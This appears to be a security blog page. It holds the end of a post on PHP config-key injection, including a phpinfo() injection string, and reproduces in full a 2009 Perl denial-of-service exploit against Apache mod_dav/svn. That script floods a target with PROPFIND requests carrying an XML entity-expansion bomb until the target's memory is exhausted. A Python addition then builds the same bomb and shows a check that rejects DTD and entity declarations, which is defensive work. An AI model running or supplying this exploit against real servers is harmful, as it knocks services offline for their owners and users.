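The vulnerable writer emits `$cfg['Servers'][$i]['host']=''; phpinfo();//'] = 'localhost';`, which is valid PHP that sets host to an empty string, runs phpinfo() and comments out the rest; the allow-list stops it at the key. Values still need proper escaping (var_export() in real PHP), which is a separate concern from the key injection shown here.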

Permalink: https://www.cfresh.net/web-security/179

Apache mod_dav / svn remote denial of service vulnerability

Exploiting this vulnerability exhausts all system memory.

###furoffyourcat.pl
### Apache mod_dav / svn Remote Denial of Service Exploit
### by kcope / June 2009
###
### Will exhaust all system memory
### Needs Authentication on normal DAV
###
### This can be especially serious stuff when used against
### svn (subversion) servers!! Svn might let the PROPFIND slip through
### without authentication. bwhahaaha :o)
### use at your own risk!
##################################################################

use IO::Socket;
use MIME::Base64;

sub usage {
    print "Apache mod_dav / svn Remote Denial of Service Exploit\n";
    print "by kcope in 2009\n";
    print "usage: perl furoffyourcat.pl <remotehost> <webdav folder> [username] [password]\n";
    print "example: perl furoffyourcat.pl svn.XXX.com /projects/\n";exit;
}

if ($#ARGV < 1) {usage();}

$hostname = $ARGV[0];
$webdavfile = $ARGV[1];

$username = $ARGV[2];
$password = $ARGV[3];
                            
$|=1;

$BasicAuth = encode_base64("$username:$password");
chomp $BasicAuth;

my $sock = IO::Socket::INET->new(PeerAddr => $hostname,
                              PeerPort => 80,
                              Proto    => 'tcp');
print $sock "PROPFIND $webdavfile HTTP/1.1\r\n";
print $sock "Host: $hostname\r\n";
print $sock "Depth: 0\r\n";
print $sock "Connection: close\r\n";
if ($username ne "") {
print $sock "Authorization: Basic $BasicAuth\r\n";    
}
print $sock "\r\n";
$x = <$sock>;    

print $x;
if (!($x =~ /207/)) {
while(<$sock>) {
    print;    
}
close($sock);
print "No PROPFIND on this server and path.\n";
exit(0);    
}

$a = "";
for ($i=1;$i<256;$i++) {        # Here you can increase the XML bomb count
    $k = $i-1;
    $a .= "<!ENTITY x$i \"&x$k;&x$k;\">\n"
}

$igzml =
"<?xml version=\"1.0\"?>\n"
."<!DOCTYPE REMOTE [\n"
."<!ELEMENT REMOTE ANY>\n"
."<!ENTITY x0 \"foobar\">\n"
.$a
."]>\n"
."<REMOTE>\n"
."&x$k;\n"
."</REMOTE>\n";

print "Apache mod_dav / svn Remote Denial of Service Exploit\n";
print "by kcope in 2009\n";
print "Launching DoS Attack…\n";

$ExploitRequest =
"PROPFIND $webdavfile HTTP/1.1\r\n"
."Host: $hostname\r\n"
."Depth: 0\r\n";

if ($username ne "") {
$ExploitRequest .= "Authorization: Basic $BasicAuth\r\n";    
}
$ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($igzml)."\r\n\r\n" . $igzml;

while(1) {
again:
my $sock = IO::Socket::INET->new(PeerAddr => $hostname,
                              PeerPort => 80,
                              Proto    => 'tcp') || (goto again);

print $sock $ExploitRequest;
print ";Pp";
}

# milw0rm.com [2009-06-01]
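The entity-expansion body the script sends, generated the same way and sized, plus the check a WebDAV or Subversion front end can run before handing a PROPFIND body to an XML parser. This is an added example, not the exploit's code: the generator mirrors the Perl loop (x0 is the seed, each x_i is two copies of x_{i-1}; note the script defines x1..x255 but, because $k is $i-1, its root references &x254;), expansion_size() gives the number of bytes the root element holds once expanded, and check_xml_body() refuses any DTD or entity declaration outright, since a legitimate PROPFIND body never carries one. The size limit, the regexes and the sample PROPFIND are my assumptions.

```python
# Added example (not from the exploit): build the same entity bomb, compute its
# expanded size, and gate PROPFIND bodies before the XML parser sees them.
import re
import xml.etree.ElementTree as ET


def build_entity_bomb(levels: int, seed: str = "foobar") -> str:
    """x0 is the seed; every x_i expands to two copies of x_{i-1}; the root references x_levels."""
    decls = [f'<!ENTITY x0 "{seed}">']
    decls += [f'<!ENTITY x{i} "&x{i - 1};&x{i - 1};">' for i in range(1, levels + 1)]
    return ('<?xml version="1.0"?>\n<!DOCTYPE REMOTE [\n<!ELEMENT REMOTE ANY>\n'
            + "\n".join(decls) + f"\n]>\n<REMOTE>\n&x{levels};\n</REMOTE>\n")


def expansion_size(levels: int, seed: str = "foobar") -> int:
    """Bytes the root element holds after full expansion: len(seed) * 2**levels."""
    return len(seed) * 2 ** levels


DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
ENTITY_RE = re.compile(rb"<!ENTITY\b", re.IGNORECASE)


def check_xml_body(body: bytes, max_bytes: int = 1 << 20) -> str:
    """Gate applied before parsing. Returns 'ok' or a 'rejected: ...' reason.
    A PROPFIND body never needs a DTD, so any DOCTYPE or ENTITY is refused."""
    if len(body) > max_bytes:
        return "rejected: body too large"
    if DOCTYPE_RE.search(body) or ENTITY_RE.search(body):
        return "rejected: DTD / entity declarations are not accepted"
    return "ok"


def parse_propfind(body: bytes) -> list:
    """Parse only after the gate passes; return the tags under <D:propfind>."""
    verdict = check_xml_body(body)
    if verdict != "ok":
        raise ValueError(verdict)
    root = ET.fromstring(body)
    if root.tag != "{DAV:}propfind":
        raise ValueError("not a PROPFIND body")
    return [child.tag for child in root]


# Constructed benign request body of the kind a DAV client actually sends
SAFE_PROPFIND = (b'<?xml version="1.0"?>'
                 b'<D:propfind xmlns:D="DAV:"><D:allprop/></D:propfind>')


if __name__ == "__main__":
    bomb = build_entity_bomb(254).encode()     # what the script's loop ends up referencing
    print(len(bomb), "bytes on the wire ->", expansion_size(254), "bytes once expanded")
    print(check_xml_body(bomb))
    print(parse_propfind(SAFE_PROPFIND))
```

A few kilobytes on the wire expand to 6 * 2**254 bytes, which is why a parser that resolves entities eagerly and without an amplification limit runs the machine out of memory; rejecting the DTD up front costs one regex scan per request and does not depend on the parser's own limits.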

Permalink: https://www.cfresh.net/web-security/180